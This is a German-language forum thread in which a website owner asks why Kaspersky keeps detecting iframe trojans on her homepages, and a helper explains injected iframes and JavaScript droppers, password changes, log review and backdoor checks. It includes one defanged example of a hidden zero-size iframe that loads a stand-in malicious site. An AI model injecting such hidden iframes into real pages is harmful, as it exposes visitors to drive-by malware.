Ich habe seit Tagen folgendes Problem.
Ich bekomme immer wieder von kaspersky eine Meldung dass sich ein Trojaner auf meiner HP eingeschlichen hat und auch bei einer Hp die ich für meine Kollegin gemacht habe (trojan-clicker.html.iframegt und trojan-downloader.JS.iframe.gt und trojan-clicker.J.S.Agent.h

Nun, wenn ich die HP vom Server lösche und wieder hochlade, habe ich für 1-2 Tage ruhe, dann kommt die Meldung wieder.

www.creamore.ch
und im Background www.creamore.ch/kontakt.htm
die andere heisst
www.bluemelade.ch

Nun hat mir jemand gesagt, dass evtl im Quellcode was falsch ist...
kann mir von euch jemand sagen, ob vielleicht im Quellcode von der Index Seite was falsch ist?
Denn ich habe nichts gefunden.
DANKE

ach ja, mit Kaspersky hatte ich Kontakt die haben mir folgendes geschrieben:

wir haben nochmals intensiv Ihre Webseite untersucht. Leider muss ich Ihnen mitteilen, dass sich eine Bedrohung auf der Seite befindet
„Trojan-Downloader.HTML.IFrame.ds“.

Eventuell könnte die Homepage gehakt wurden sein.
Ich bitte Sie, ihre Homepage erneut auf den Server zu laden.

_________________________________

das habe ich nun schon zigmal gemacht..nach ca 1-2 Tage kommt aber wieder diese Meldung..sniff...
Ich möchte einfach verstehen um was es sich hier genau handelt, was das für Folgen für meine Homepagebesucher hat und wie ich dieses Unding wieder loswerde...+"*ç%&/

vielen lieben Dank jetzt schon im voraus...

Hi,

ich habe gerade auf beiden Seiten nichts feststellen können, außer dass die eine offline ist. Dein Bericht deutet aber stark darauf hin, dass die Seiten auf dem Server infiziert werden.

Erstmal solltest Du versuchen, wenn es Meldungen des Scanners gibt, die Dateien in die Quarantäne schieben zu lassen. dort kann man sie wieder rausholen, um sie zu untersuchen.

Dann hilft es, wenn sich der Zeitraum, in dem die Infektion geschehen ist, möglichst klein einengen lässt. Für diesen Zeitraum müsstest Du dann die Logs durchsehen, und zwar HTTP und FTP (über das die Seite ja wohl hochgeladen wird).

Aller Wahrscheinlichkeit nach wird die Seite um etwas Code erweitert. Entweder ein Stück Javascript oder ein Iframe, beide dienen aber dem Zweck, dass zusätzlich von einem anderen Server was geladen wird, was dann versucht den Computer zu infizieren. Auf Systemen mit aktueller Software und sicherer Konfiguration passiert da normalerweise nichts, gefährlich ist es für Systeme, denen Updates fehlen, die Fehler beseitigen, deren Ausnutzung zur Ausführung von schadhaftem Code führen kann.

Gruß, Karl

@KarlKarl
offline?? offline ist keine Seite.
meine eigene creamorehp lauft im Background und die erreicht man über
www.creamore.ch/kontakt.htm

Ich habe nun beim FTP Account das Passwort geändert, alles gelöscht und nochmals hochgeladen.
Bis jetzt habe ich auch keine Meldung bekommen.

Dein Zitat hier verstehe ich nicht ganz...soorry...ggg..bin Hausmama und kein CompiProfi..gggggg....

Aller Wahrscheinlichkeit nach wird die Seite um etwas Code erweitert. Entweder ein Stück Javascript oder ein Iframe, beide dienen aber dem Zweck, dass zusätzlich von einem anderen Server was geladen wird, was dann versucht den Computer zu infizieren. Auf Systemen mit aktueller Software und sicherer Konfiguration passiert da normalerweise nichts, gefährlich ist es für Systeme, denen Updates fehlen, die Fehler beseitigen, deren Ausnutzung zur Ausführung von schadhaftem Code führen kann.

Über den Umweg mit der Kontakt-Seite habe ich dann auch Seiten gesehen, ich meinte die Startseite, die das verkündet.

Sorry. da Du Webdesign machst, bin ich davon ausgegangen, dass dir z.B. IFRAME ein Begriff ist. Für eine bösartige Anwendung reicht es aus, ein paar Zeichen an eine HTML-Datei anzuhängen. Ungefähr sowas (hab anstelle von "iframe" "ifra_me" geschrieben, damit die Gefahr von Fehlalarmen durch diese Forumsseite hoffentlich Null ist):

Code: Alles auswählenAufklappen

ATTFilter

<ifra_me src="http://boese_seite.com/" width="0" height="0" style="visibility:hidden"></ifra_me>
         

Ohne dass man es sieht, wird in die Seite der Inhalt von boese_seite.com geladen und der kann beliebig boese sein.

Die Javascript-Variante könnte erstmal einen Code entschlüsseln, dabei kommt dann der IFRAME bei heraus, derdann mit document.write() in die Seite geschrieben wird, womit er ebenfalls geladen wird. Alternativ könnte bei der Entschlüsselung auch ein Script rauskommen, das direkt versucht Fehler im Browser auszunutzen.

Es gibt sehr viele Möglichkeiten, am Ende läuft es aber immer darauf hinaus, dass versucht wird, ein schadhaftes Programm auf dem Computer zur Ausführung zu bringen. Das kann dann ein kleiner Donwloader sein, der eine Anzahl weiter Viren, Würmer, Trojaner runterlädt und ebenfalls ausführt. Damit das abe funktionieren kann, muss entweder eine fehlerhafte Software auf dem Computer sein, bei der ein entsprechend präpariertes Datenpaket zur Programmausführung führt oder die Konfiguration des Systems fehlerhaft sein, das Webseiten einfach alles erlaubt wird (z.B. die automatische Ausführung von Programmen).

Ich würde jetzt erstmal abwarten (und natürlich sehr oft kontrollieren, ob es in Ordnung ist). wenn Du Glück hast, war es der Wechsel des FTP-Passworts schon. Bleibt allerdings die Frage offen, wie es dann verraten werden konnte. Solltest Du auf deinem Computer einen Keylogger haben, wäre das neue Passwort schon jetzt verraten.

Für jeden Zugriff auf eine Seite deines Webangebots zeichnet der Webserver Informationen in einem Log auf. Datum und Zeit, IP, welche Seite, usw, eine Menge mehr. Ebenso zeichnet der FTP-Server für jeden Zugriff auf den Webspace, also das hoch- bzuw. runterladen einer Datei Informationen auf. Datum und Zeit, IP, welche Datei, ihre größe, usw. Wenn es wieder zu Veränderungen kommt, ist es wichtig, für den Zeitraum, in dem die Veränderungen passiert sind, in diese Logs zu schauen. Es kann einem, wie gerade in einem anderen Thread hier im Forum geschehen, verraten, auf welchem Weg die Veränderungen erfolgt sind. Dort bin ich in den FTP-Logs fündig geworden. Diese Logs solltest Du auf jeden Fall laden.

Ach ja: Wenn Du die saubere Version der Seite hochlädst, muss auch noch kontrolliert werden, ob es im Webspace Dateien gibt, die nicht von dir sind. Es könnte dort jemand ein Backdoor-Sckript abgelegt haben. Die einfachste Variante ist es wohl, vor dem hochladen alles zu löschen. Besser fände ich es allerdings, von einer eventuell dort abgelegten Datei eine Kopie aufzubewahren.

@KarlKarl
wow..vielen Dank für Deine ausführliche Antwort.
was ein Iframe ist, denke ich weiss ich, aber meine HP ist ja ohne Frames gemacht.
werde nun aber sicher immer wieder überprüfen!
ich konnte das PW nur mal bei meiner creamore hp ändern.
mal schauen wie es weiter geht.
werde hier sicher auf dem laufenden halten.

nochmals vielen herzlichen DANK!!!!!
und das noch an Pfingsten..wow....

Teile der beiden Seiten habe ich mir ja auch im Quelltext angesehen, sind ja recht übersichtlich, ich habe auch nichts gesehen, was mir kritisch erscheinen würde. Der IFRAME eines solchen Angreifers wird aber eingefügt, am einfachsten einfach hinten an die Datei angehängt. Das hat nichts damit zu tun, ob Du Frames benutzt oder nicht.

dann mache ich davon mal eine Kopie und falls sich der Trojaner wieder melden würde dann auch eins, habe ich das so richtig verstanden??

welches Logfile ist wichtig?
habe eins das heisst:
access.log
und
access.log.prossed
und
error.log
und
xferlog. regular
und
xferlog.log.prossed